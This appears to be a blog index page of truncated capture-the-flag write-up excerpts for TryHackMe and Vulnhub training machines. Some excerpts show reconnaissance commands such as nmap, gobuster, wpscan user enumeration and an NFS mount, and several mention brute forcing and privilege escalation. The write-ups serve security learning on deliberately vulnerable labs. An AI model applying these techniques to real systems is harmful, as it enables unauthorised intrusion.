toc2 It’s a setup… Can you get the flags in time?. This is toc2 from THM. It’s medium rated. I mostly want to talk about the privesc, because I hadn’t seen it before. Foothold Just a quick note on this; we were given some database credentials and allowed to install...
Vulnhub: OS-HACKNOS-3
OS-HACKNOS-3 Difficulty: Intermediate This is OS-HACKNOS-3 from Vulnhub. Ports SSH and HTTP only. Web At the website, some dirsearch work reveals two different webapps. We’ve got Gila CMS running at http://hacknos/websec/, and OSTicket running at http://hacknos/devil/. I try brute forcing both login pages but both have brute force prevention turned...
THM: Archangel
Archangel A well known security solutions company seems to be doing some testing on their live machine. Best time to exploit it. This is Archangel from THM. It’s easy rated, but I would say it’s not the easiest easy. This writeup is a bit half-hearted, but it captures the important...
THM: Keldagrim
Keldagrim The dwarves are hiding their gold! This is Keldagrim from THM. It’s medium rated and I liked it a lot. Ports SSH and HTTP; that’s it. We don’t use SSH, this is 100% web. HTTP It’s a pretty simple website, about selling gold in Runescape and other MMOs (I...
Vulnhub: Symfonos 1
Symfonos 1 Beginner real life based machine designed to teach a interesting way of obtaining a low priv shell. This box is on the NetSecFocus Admin list of OSCP-like machines. It’s SYMFONOS: 1 from Vulnhub. I did not complete it without hints; nothing like getting humbled by a ‘beginner’ box...
THM: Madeye's Castle
Madeye’s Castle A boot2root box that is modified from a box used in CuCTF by the team at Runcode.ninja This is Madeye’s Castle from THM. It’s medium rated and came out earlier today. Ports SSH, HTTP on Port 80 and SMB (139/445) are our open ports. SMB We have anonymous...
THM: Bebop
Bebop Who thought making a flying shell was a good idea? This is Bebop from THM. It’s easy rated and is supposed to be about taking over a drone or something. Ports SSH and Telnet on port 23. Telnet We were given a password: pilot. Let’s try it? root@kali:/opt/tryhackme/bebop# telnet...
THM: Linux Agency
Game Zone This Room will help you to sharpen your Linux Skills and help you to learn basic privilege escalation in a HITMAN theme. So, pack your briefcase and grab your SilverBallers as its gonna be a tough ride. This is Linux Agency from THM. It doesn’t seem to have...
Vulnhub: INCLUSIVENESS: 1
Sustah Inclusiveness is an intermediate boot to root VM to practice your hacking skills. Can you get in? This is INCLUSIVENESS: 1 from Vulnhub. The creator described it as intermediate. Let’s go. Ports FTP, SSH and HTTP. FTP Anonymous login with upload enabled, what’s not to love? Doesn’t help yet...
THM: Game Zone
Game Zone Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root! This is Game Zone from THM. It’s easy rated and effectively a walk through. I won’t say much about it. Privesc...
THM: Sustah
Sustah Play a game to gain access to a vulnerable CMS. Can you beat the odds? This is Sustah from THM. It’s medium rated. We have another ‘hint’: The developers have added anti-cheat measures to their game. Are you able to defeat the restrictions to gain access to their internal...
THM: Cyborg
Cyborg A box involving encrypted archives, source code analysis and more. This is Cyborg from THM. It’s easy rated. I’ve been fighting Sustah but stonewalling, so let’s try this one. Ports SSH and HTTP only. HTTP The front page is the Apache default page, so it’s dirsearch to the rescue:...
THM: Skynet
battery A vulnerable Terminator themed Linux machine. This is Skynet from THM. It’s easy rated, subscriber only and part of the ‘Offensive Pentesting’ learning path. I’ve decided to subscribe; I’ll just try one month at this stage and see if I like it. Ports We’ve got a few ports: PORT...
THM: Battery
battery Electricity bill portal has been hacked many times in the past , so we have fired one of the employee from the security team , As a new recruit you need to work like a hacker to find the loop holes in the portal and gain root access to...
THM: Chocolate Factory
Chocolate Factory This room was designed so that hackers can revisit the Willy Wonka’s Chocolate Factory and meet Oompa Loompa This is a beginner friendly room! This is Chocolate Factory from THM. It’s easy rated, although it’s not the noobiest one I’ve ever seen. Ports Wew, lots - there are...
THM: Nax
Overpass3 Identify the critical security flaw in the most powerful and trusted network monitoring software on the market, that allows an user authenticated execute remote code execution. This is Nax from THM. It’s medium rated and somewhat guided. Ports PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open...
THM: Overpass 3 - Hosting
Overpass3 You know them, you love them, your favourite group of broke computer science students have another business venture! Show them that they probably should hire someone for security… This is Overpass 3 - Hosting from THM. It’s medium rated. I add overpass3 to /etc/hosts. Ports We’ve got FTP, SSH...
THM: ColddBox: Easy
Jacob the Boss An easy level machine with multiple ways to escalate privileges. This is ColddBox from THM. Ports HTTP on port 80 and SSH hiding away on port 4512. We won’t need it anyway. HTTP What’s that - did someone say Wordpress? root@kali:/opt/tryhackme/colddbox# wpscan -e --url http://10.10.0.137 Gets 3...
Babby's first VM
First VM This is just a really quick note. I didn’t do any practice yesterday because I made my first VM instead. It’s pretty basic but I’m happy with how it turned out so I’ve reached out to Vulnhub about submitting it, so we’ll see what happens there. I don’t...
THM: Jacob & KOTH May 2020
Jacob the Boss Find a way in and learn a little more. First of all, add the jacobtheboss.box address to your hosts file This is Jacob the Boss from THM. Ports Quite a few here: PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 1090/tcp open ff-fms...
THM: Thompson
Introduction boot2root machine for FIT and bsides guatemala CTF This is Thompson from THM. It’s the last one of the bsides guatemala boxes. This one took me 13 minutes. I’m on a roll. Ports SSH and an HTTP proxy on port 8080. We’ve got a picture of Tomcat, so it’s...
THM: Anonforce
Introduction boot2root machine for FIT and bsides guatemala CTF This is Anonforce from THM. Like Dav and Library, it’s ranked easy. This box took me about 12 minutes. Ports FTP and SSH only, on the standard ports. FTP We’ve got anonymous login so let’s use it; we get the root...
THM: Library
Introduction boot2root machine for FIT and bsides guatemala CTF This is Library from THM. Like Dav, this one is ranked easy and doesn’t give any hints as to what it’s about. I’ve been away at the beach for a few days hence no hacking. In fact, these were the first...
THM: Dav
Introduction boot2root machine for FIT and bsides guatemala CTF This is Dav from THM. This one is ranked as easy and doesn’t give much in the way of hints as to what it’s about. Ports HTTP only; makes it simple. HTTP Running a basic gobuster turns up a single page:...
THM: All In One
Introduction This box’s intention is to help you practice several ways in exploiting a system. There is few intended paths to exploit it and few unintended paths to get root. Try to discover and exploit them all. Do not just exploit it using intended paths, hack like a pro and...
Vulnhub - GANANA: 1
Introduction This is a fairly simple machine rated easy to intermediate. There is only one flag to capture root.txt. This is Ganana: 1 from vulnhub. Ports We have three open ports, and SSH is closed: 22/tcp closed ssh 80/tcp open http 443/tcp open https 6777/tcp open ntz-tracker Although this says...
Vulnhub - DIGITALWORLD.LOCAL: MERCY V2
Introduction MERCY is a machine dedicated to Offensive Security for the PWK course, and to a great friend of mine who was there to share my sufferance with me. :-) MERCY is a name-play on some aspects of the PWK course. It is NOT a hint for the box. Note:...
Vulnhub - TIKI: 1
Introduction Oh no our webserver got compromised. The attacker used an 0day, so we dont know how he got into the admin panel. Investigate that. This is an OSCP Prep Box, its based on a CVE I recently found. Its on the OSCP lab machines level. This box is on...
Vulnhub - CALLME: 1
Introduction Machine name: Callme Level: Easy flags: user, root Description: This is a Linux box with a custom remote access This is CALLME: 1 from Vulnhub. I did the foothold/user part of this myself, and then checked a writeup for the privesc. Which I didn’t successfully run; whatever. Ports 22/tcp...
Vulnhub - ODIN: 1
Introduction Difficulty: Easy Odin ventured to the Well of Mimir, near Jötunheim, the land of the giants in the guise of a walker named Vegtam. Mímir, who guarded the well, to allow him to drink from it, asked him to sacrifice his left eye, this being a symbol of his...
Vulnhub - Y0USEF: 1
Introduction Get two flag Difficulty : easy This is Y0USEF: 1 from Vulnhub. I’ve been so fricking busy lately. Ports SSH and HTTP only. HTTP The front page just says it’s under construction so it’s off fuzzing we must go. The directory we want is mis-spelled - I assume deliberately...
Vulnhub - HOGWARTS: BELLATRIX
Introduction The evil Bellatrix Lestrange has escaped from the prison of Azkaban, but as … Find out and tell the Minister of Magic Difficult: Medium This works better in VirtualBox Hints –> Brute force is not necessary, unless it is required. ncat is the key ;) This is HOGWARTS: BELLATRIX...
Vulnhub - INO: 1
Introduction Level: Easy flags: user, root Description: This machine require a low skill to get user flag, a little more skill to escalate to root! Author: foxlox This is INO: 1 from Vulnhub. Ports SSH, SMTP (25) and HTTP. HTTP Well, this webserver hated me. Because it’s running fail2ban. Basically...
Vulnhub - INFERNO: 1
Introduction Real Life machine vs CTF. Midway upon the journey of our life I found myself within a forest dark, For the straightforward pathway had been lost. Ah me! how hard a thing it is to say What was this forest savage, rough, and stern, Which in the very thought...
THM Advent of Cyber 2020
Introduction Get started with Cyber Security in 25 Days - Learn the basics by doing a new, beginner friendly security challenge every day leading up to Christmas. This is Advent of Cyber 2 from TryHackMe. This is basically a meta post. I joined TryHackMe 242 days ago today; that must’ve...
THM: Bookstore
Introduction A Beginner level box with basic web enumeration and REST API Fuzzing. This is Bookstore from TryHackMe. The description implies it’s easy, but it’s medium rated which I think is a rating given by the THM testing crew. Ports We’ve got SSH, HTTP and port 5000, which is: 5000/tcp...
A couple of unsatisfying endeavours
Part The First This boot2root machine is realistic without any CTF elements and pretty straight forward. Goal: Hack your University and get root access to the server. To successfully complete the challenge you need to get user and root flags. Difficulty: Easy / Beginner Level This is VULNUNI: 1.0.1 from...
THM: Chill Hack
Introduction Chill the Hack out of the Machine. Intermediate level CTF. Capture the flags and have fun! This is Chill Hack from TryHackMe. It’s medium rated. Ports We’ve got FTP, SSH and HTTP on port 80. FTP Anonymous login is permitted, and there is a note.txt that gives some message...
Vulnhub - LOLY: 1
Introduction Difficulty: Easy Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox) Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). This is LOLY: 1 from Vulnhub. Ports We’ve got one port only - HTTP on Port 80. Wordpress Really the only thing...
THM: Revenge
Introduction You’ve been hired by Billy Joel to get revenge on Ducky Inc…the company that fired him. Can you break into the server and complete your mission? This is Revenge from TryHackMe. It’s medium rated. Cut to the chase I’m going to skip over a lot of this. Foothold is...
Vulnhub - W34KN3SS: 1
Introduction The matrix is controlling this machine, neo is trying to escape from it and take back the control on it , your goal is to help neo to gain access as a “root” to this machine , through this machine you will need to perform a hard enumration on...
Vulnhub - M87: 1
Introduction m87 is a simple machine, created specifically to be exploited. Don’t get discouraged and always Try Harder! This is M87: 1 from Vulnhub. Ports We’ve got 3 ports - SSH on 22, HTTP on 80 and something on port 9090, but SSH is filtered so it doesn’t count. What’s...
Vulnhub - KIRA: CTF - more like WTF, amirite?
Introduction This box has no description or explanation. Okey dokey. This is KIRA: CTF from Vulnhub. Ports Well, we always run nmap right? Lol no. This box has autologon enabled! I start it up and it immediately logs on as bassam with the full Ubuntu GUI experience. Who cares what...
Vulnhub - WARZONE: 2
Introduction Enumeration, Flask, Port Forwarding, GTFObins Created and Tested in Virtual box (NAT network) Hint : lowercase letters This is WARZONE: 2 from Vulnhub. Ports We’ve got 3 ports - FTP, SSH and 1337. What’s 1337? nmap doesn’t give us much, so let’s netcat it: root@kali:/opt/vulnhub/warzone2# nc 192.168.1.144 1337 #...
Vulnhub - HOGWARTS: DOBBY
Introduction dobby needs to be root to help harry potter, dobby needs to be a free elf Difficult: Easy This works better in VirtualBox This is HOGWARTS: DOBBY from Vulnhub. Ports HTTP only; makes targeting easier. HTTP and Rabbits This one has a few rabbitholes, or at least red herrings....
Vulnhub - HEMISPHERE: GEMINI
Prelude Since my last post I did Brute It on THM and more or less finished TommyBoy from Vulnhub, although I had to consult a write-up for a hint or two on that one. I did most of it myself. I probably won’t write a post about it. Introduction Difficulty:...
THM: Startup
Introduction We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (incase you get hungry), but that is not why you are here. To be truthful, we aren’t sure if our developers know what they are doing and...
Vulnhub - ELECTION: 1
Introduction It is an OSCP-like VM, Medium Level difficulty. This is eLection: 1 from Vulnhub. Ports SSH and HTTP only; simple. HTTP robots.txt has four disallowed entries: admin, wordpress, user, and election. 1 through 3 actually don’t exist, but election does. It’s a Web Based Election System from tripath. Searchsploit...
THM: The Server From Hell
Introduction Face a server that feels as if it was configured and deployed by Satan himself. Can you escalate to root?. This is The Server from Hell from TryHackMe. The only instruction says: Start at port 1337 and enumerate your way. I started an nmap scan but there was port...
THM: Undiscovered
Introduction Discovery consists not in seeking new landscapes, but in having new eyes. This is Undiscovered from TryHackMe. Interestingly, this actually was a Vulnhub machine for a while then got moved to THM. I found the foothold and figured out the privesc, but didn’t know how to do the lateral...
Vulnhub - DEV: 1
Introduction Easy level Linux box. This box “dev” aims to educate people on common and misconfigurations of a widely used developer tool. Use a good wordlist! This is DEV: 1 from vulnhub. Ports We have two ports only, SSH and HTTP on the standard port 80. HTTP We’ve got a...
Vulnhub - CHEESEY: CHEESEYJACK
Introduction Cheeseyjack aims to be an easy to medium level real-world-like box. Everything on this box is designed to make sense, and possibly teach you something. Enumeration will be key when attacking this machine. Hint: A cewl tool can help you get past a login page. This is CHEESEY: CHEESEYJACK...
Vulnhub - FishyMail: 1
Introduction This is my first vulnerable virtual machine called fishymail. You can download it here load the .vdi up on VirtualBox and give it a try. This is FishyMail: 1 from vulnhub. Setup This box is provided as a virtual disk image, not as a full VM. So you have...
Vulnhub - COLDDBOX: EASY
Introduction Welcome to ColddBox Easy, it is a Wordpress machine with an easy level of difficulty, highly recommended for beginners in the field, good luck! Please share your feedback: “https://twitter.com/C0ldd__” This is ColddBox: Easy from vulnhub. Last one before bedtime - this will be brief. Ports This box just has...
Vulnhub - KB-VULN: 3
Introduction This machine is the kind that will measure your research ability. This VM is running on VirtualBox. It includes 2 flags:user.txt and root.txt. This is KB-VULN: 3 from vulnhub. After doing Tenderfoot I rolled straight into this one and knocked it over too. Ports This box has: 22/tcp open...
Vulnhub - TENDERFOOT: 1
Introduction A very Easy Box for beginners, I recommend this box if you are new here. Your task is to grab all the 3 flags (user1.txt, user2.txt, proof.txt). This is TENDERFOOT: 1 from vulnhub. After banging my head on a few others, I thought I’d run through an easy box...
Vulnhub - SUNSET: MIDNIGHT
Introduction Difficulty: Intermediate Important!: Before auditing this machine make sure you add the host “sunset-midnight” to your /etc/hosts file, otherwise it may not work as expected. This is SUNSET: MIDNIGHT from vulnhub. Ports This box has: SSH on port 22, HTTP on port 80, and MariaDB (MySQL) on 3306. HTTP...
Vulnhub - THE PLANETS: MERCURY
Introduction Mercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash. This is THE PLANETS: MERCURY from vulnhub. Ports This box has SSH on port 22, and HTTP on port 8080. The nmap detail...
Vulnhub - DERPNSTINK: 1
Introduction Mr. Derp and Uncle Stinky are two system administrators who are starting their own company, DerpNStink. Instead of hiring qualified professionals to build up their IT landscape, they decided to hack together their own system which is almost ready to go live… This box is on the NetSecFocus Admin...
Vulnhub - BOB: 1.0.1
Introduction Difficulty: Beginner/Intermediate Bob is my first CTF VM that I have ever made so be easy on me if it’s not perfect. The Milburg Highschool Server has just been attacked, the IT staff have taken down their windows server and are now setting up a linux server running Debian....
Vulnhub - Toppo: 1
Introduction The Machine isn’t hard to own and don’t require advanced exploitation . Level : Beginner DHCP : activated Inside the zip you will find a vmdk file , and I think you will be able to use it with any usual virtualization software ( tested with Virtualbox) This box...
Vulnhub - SAR: 1
Introduction Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing. This box is on the NetSecFocus Admin list of OSCP-like machines. It’s SAR: 1 from vulnhub. Ports HTTP on port 80 only. This already makes things easy because you know that you’ll...
Vulnhub - NULLBYTE: 1
Introduction Objetcive: Get to /root/proof.txt and follow the instructions. Level: Basic to intermediate. Description: Boot2root, box will get IP from dhcp, works fine with virtualbox&vmware. Hints: Use your lateral thinking skills, maybe you’ll need to write some code. This box is on the NetSecFocus Admin list of OSCP-like machines. It’s...
Vulnhub - EVM: 1
Introduction This is super friendly box intended for Beginner’s This may work better with VirtualBox than VMware – note: some of the spelling and punctuation errors on this blog are mine; but if I quoted something (like above), I tend to quote it verbatim, even if I know it’s incorrect....
Vulnhub - LemonSqueezy: 1
Introduction This is a beginner boot2root in a similar style to ones I personally enjoy like Mr Robot, Lazysysadmin and MERCY. This is a VMware machine. DHCP is enabled, add lemonsqueezy to your hosts. It’s easypeasy! This box is on the NetSecFocus Admin list of OSCP-like machines. It’s LEMONSQUEEZY: 1...
Vulnhub - DEVCONTAINER: 1
Introduction Goal: 2 flagas Difficulty: Easy-intermediate Well, not much to go on here. The box is DEVCONTAINER: 1 from vulnhub. Ports We’ve got one port only; HTTP on 80. HTTP So with a quick gobuster fishing expedition we find an upload directory: http://192.168.1.97/upload/ And it contains the text: Allowed file...
THM - Develpy
Introduction boot2root machine for FIT and bsides Guatemala CTF. Not much to go on here. This one is Medium rated. Let’s begin. Ports Nmap says we’ve got two ports only - SSH on 22 and a mystery port on 10000. Visiting port 10000 in Firefox presents the following message: Private...
Vulnhub - Funbox2: Rookie
Introduction Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first I went away again for a few days; this time with the family - so that was...
Vulnhub - Funbox: Next Level
Introduction Lets separate the script-kids from script-teenies. Hint: The first impression is not always the right one! No updates for a few days; I was away for work for a bit and I’ve been partway through a few things - but now I’ve completed Funbox: Next Level. Here’s how. Ports...
Vulnhub - KB-VULN:2 and EasyEnum
Introduction Two easy boxes rooted; let’s go. KB-VULN: 2 Funbox: EasyEnum KB-VULN2 ports We’ve got a few: FTP, SSH on 22, HTTP on 80 and SMB. We’ve got no anonymous access to FTP; let’s ignore that. We have login to a share on SMB called ‘Anonymous’ and from that we...
Vulnhub - Cewlkid: 1
Introduction An intermediate boot2root. The name is a hint. The start is CTF but the end is real world and worth the effort. Created in Virtualbox. Goal: Get the root flag. Real world eh? Sounds interesting. Let’s see what we’ve got… Ports We’ve got SSH and two HTTP ports: 80...
Choosing your battles
Not fair My write-up for Madness on TryHackMe was critical of the box (or room, to use their preferred terminology), because of the nature of part of the challenge. I haven’t changed my mind about how I feel about it personally, but the criticism was probably a bit unfair. Someone...
Downunder CTF
Introduction What is DownUnderCTF? DownUnderCTF is a world-wide Capture The Flag (CTF) competition targeted at Australian High School and University Students. This ran over the weekend. I had a go at it when I had some spare time, and I did…okay I guess. I finished 118th out of 1080 teams...
Vulnhub - Potato: 1
Introduction Difficulty: Easy to Medium Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox) Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). This is another box from the same people who made Chili and Cherry, but it’s rated easy to medium rather...
Vulnhub - Cherry: 1
Introduction Difficulty: Easy Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox) Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). This is another easy rated box from the same people who made Chili. nmap This time we get four ports: 22/tcp open...
Vulnhub - Chili: 1
Introduction Difficulty: Easy Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox) Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). Okay then, let’s go. nmap All we’ve got is FTP and HTTP on port 80; nothing else. Nothing on the top 1000...
THM - RootMe with a twist
Introduction A ctf for beginners, can you root me? I’ve thought a few times that maybe I could do a THM room entirely on my phone. Not because I had to, but for the additional challenge. If you’ve ever seen Mitten Squad on YouTube you might get the idea. Today...
Vulnhub & THM notes
Introduction I’ve recently completed NULLY CYBERSECURITY: 1 and ONSYSTEM: SHELLDREDD #1 HANNAH from Vulnhub and Poster from TryHackMe. These are some brief thoughts about each one. Nully This was great; I really enjoyed it. I will probably write it up separately. But essentially it’s three separate servers/services (Mail, Web and...
THM - Ghizer
Introduction lucrecia has installed multiple web applications on the server. Okay, good to know. This one is Medium rated. Let’s begin. Ports Nmap says we’ve got these ports: 21/tcp open ftp 80/tcp open http 443/tcp open https 18002/tcp open unknown 35767/tcp open unknown 38959/tcp open unknown A more detailed scan...
Testing, testing
Here, or meta? Really this is a test to see if I can write a blog post on my phone with Joplin and then push it to my github repo using termux. If this goes online, it worked. Also, I did the new THM machine Game Server. It was pretty...
THM - Kiba
Introduction Identify the critical security flaw in the data visualization dashboard, that allows execute remote code execution. Alrighty; easy rated. Nmap We’ve got four ports: SSH on 22 and HTTP on 80, plus two mystery ports in 5044 and 5601. Port 80 There’s nothing much on the front page on...
Vulnhub - dc6
Introduction DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn’t an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is to get root and to read the one and only flag....
Vulnhub - sunset:twilight
Introduction Easy/Intermediate (May variate depending on your background) It is recommended to run this machine in Virtualbox. This works better with VirtualBox rather than VMware Okay let’s see what we can do with this. VMWare vs VirtualBox I run Kali in VMWare but I do have VirtualBox too. I downloaded...
Vulnhub - Photographer
Introduction This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt. File. Not zipped strangely, so it’s a 2.6Gb download as an ova file. Nmap We’ve got four ports: SMB (139/445), HTTP on 80 and...
THM - Jack of All Trades
Introduction Boot-to-root originally designed for Securi-Tay 2020. Jack is a man of a great many talents. The zoo has employed him to capture the penguins due to his years of penguin-wrangling experience, but all is not as it seems… We must stop him! Can you see through his facade of...
THM - Bolt
Introduction This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution. Okey dokey then. It’s easy rated. Let’s begin. Ports nmap says we’ve got three ports: 22 (SSH) and 80 (HTTP) and 8000. One of the...
THM - Gotta Catch 'em All
Introduction This room is based on the original Pokemon series. Can you obtain all the Pokemon in this room? Sure, why not. It’s easy rated. Let’s begin. Ports nmap says we’ve got two ports only: 22 (SSH) and 80 (HTTP). Webserver The front page is basically just the default Apache...
THM - Willow
Introduction What lies under the Willow Tree? This one is Medium rated with no hints. Let’s begin. Ports nmap says we’ve got four ports: 22 (SSH), 80 (HTTP), 111 (RPCBind) and 2049 (NFS). So that’s interesting. NFS Let’s go check out the NFS share. mkdir mountpoint mount -t nfs 10.10.226.215:/...
THM - Wegl
Introduction Can you exfiltrate the root flag? Dunno, but since this is an easy rated box I give myself a fighting chance. Let’s begin. Ports nmap says we’ve got 22 (SSH) and 80 (HTTP) only. Webserver The homepage for the website is just the Apache default page, with one exception...
THM - Easy Peasy
Introduction Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob. This is an easy rated box and I did it, but I can’t be bothered with writing it up. Here’s...
THM - Smag Grotto
Introduction Do you remember how to analyse packets? This is an easy rated box. Let’s begin. Ports nmap says we’ve got 22 (SSH) and 80 (HTTP) only. Webserver There’s not much on the home page for the website, so we’ll run a quick gobuster: root@kali:/opt/tryhackme/smag# gobuster dir -u http://10.10.184.160 -w...
THM - CMesS
Introduction Can you root this Gila CMS box? This is a medium rated box, and we already know it runs Gila CMS from the title. Let’s begin. Ports nmap says we’ve got 22 (SSH) and 80 (HTTP) only; web all the way? Webserver Checking searchsploit before doing much else, we...
THM - Madness
Introduction Will you be consumed by Madness? This is an easy rated box. Let’s begin. Ports nmap says we’ve got 22 (SSH) and 80 (HTTP) only. Webserver To start with, this appears to be simply the Apache default page. But hidden away is a comment: <img src="thm.jpg" class="floating_element"/> <!-- They...
THM - Brooklyn NineNine
Introduction This room is aimed for beginner level hackers but anyone can try to hack this box. There are two main intended ways to root the box. Per the description, this is a beginner box. Sometimes I battle for hours on these easy rated boxes overlooking something simple or hunting...
THM - Year of the Rabbit
Introduction Can you hack into the Year of the Rabbit box without falling down a hole? This is an easy rated box, and I’m a bit concerned that it’s an easy exploit hidden behind some annoyingly difficult to find folder on a website; we’ll see if that’s true. nmap So...
THM - Dogcat
Introduction I made this website for viewing cat and dog images with PHP. If you’re feeling down, come look at some dogs/cats! This is a medium rated box, and right up front I’ll say that I had to look up some hints for it. Let’s begin. Webserver The page description...
THM - Ignite
Introduction A new start-up has a few issues with their web server. This is another easy rated box. Let’s begin. Ports nmap says we’ve got 80 (HTTP); I originally cancelled this scan about 60% in since it was running slowly. Later I ran it again in case there was something...
THM - Billy Joel blog.
Introduction Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome! Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get...
THM - Anonymous
Introduction Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods. This is a medium rated box, although the description suggests it...
THM - Python Playground
Introduction Be creative! Jump in and grab those flags! They can all be found in the usual places. This is a hard rated box, and so far I haven’t completed it fully. Ports nmap says we’ve got 22 (SSH) and 80 (HTTP) only, and TTL says it’s Linux. A detail...
THM - Source
Introduction Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool. So we’ve got a pretty big hint already. This box is rated Easy. Ports nmap says we’ve got 22 (SSH) and 10000 only; Webmin typically runs on port 10000. Let’s get some more details though. Port Scan...
THM - Wonderland
Introduction Enter Wonderland and capture the flags. This is a medium ranked ‘Alice in Wonderland’ themed box. Let’s begin. Ports nmap says we’ve got 22 (SSH) and 80 (HTTP) only. Webserver Follow the White Rabbit. “Curiouser and curiouser!” cried Alice (she was so much surprised, that for the moment she...
THM - Mindgames
WARNING This post contains rude words, and it’s not my fault. Turn back now. Introduction No hints. Hack it. Don’t give up if you get stuck, enumerate harder. This machine is ranked hard, we’ll see if I’m up to it… Ports nmap says we’ve got 22 (SSH) and 80 (HTTP)...
THM - Boiler
Introduction Intermediate level CTF. Just enumerate, you’ll get there. Welp, let’s see if that’s true. Ports nmap says we’ve got 21 (FTP), 80 (HTTP), 10000 and 55007. Port 10000 is Webmin, and 55007 is SSH. Webmin is a web-based system configuration tool for Unix-like systems. Having SSH running on port...
THM - Haskhell
Introduction Show your professor that his PhD isn’t in security. Not much to go on there. Haskell is a programming language that I don’t know anything about. Let’s go! Ports nmap says we’ve got 22 (SSH) and 5001, which is a non-standard port. 5001/tcp open http syn-ack ttl 63 Gunicorn...
THM - Cage
Introduction Help Cage bring back his acting career and investigate the nefarious goings on of his agent! Hmmmm. Sounds cheesy. Ports nmap says we’ve got 21 (FTP), 22 (SSH) and 80 (HTTP) only. FTP FTP allows anonymous login and there is one file, called dad_tasks. Downloading it and opening it...
THM Vulniversity
Introduction So according to a post I saw on Medium, this is one of a series of OSCP like rooms on THM. I’ll give it a go. Open Ports I’ve got ports 21 (FTP), 22 (SSH), 139 + 445 (SMB), so maybe this is a Windows box. I also have...
THM Lian_Yu
Introduction Welcome to Lian_YU, this Arrowverse themed beginner CTF box! Capture the flags and have fun. Normally I keep notes in Cherrytree. I’m going to try doing notes directly into Joplin as I work instead for this. nmap root@kali:/opt/tryhackme/lian_yu# nmap -p- -T4 10.10.156.179 -oA tcp_all_ports -vv Results Ports 21 (FTP),...
TryHackMe - AgentSudo
Rules hackthebox.eu has a separation between ‘active’ and ‘retired’ machines; it’s against the rules to publish a write-up on an active machine. I’ve only recently started with tryhackme.com, which is a little different. There isn’t a distinction between active and retired machines, and as far as I can tell, there...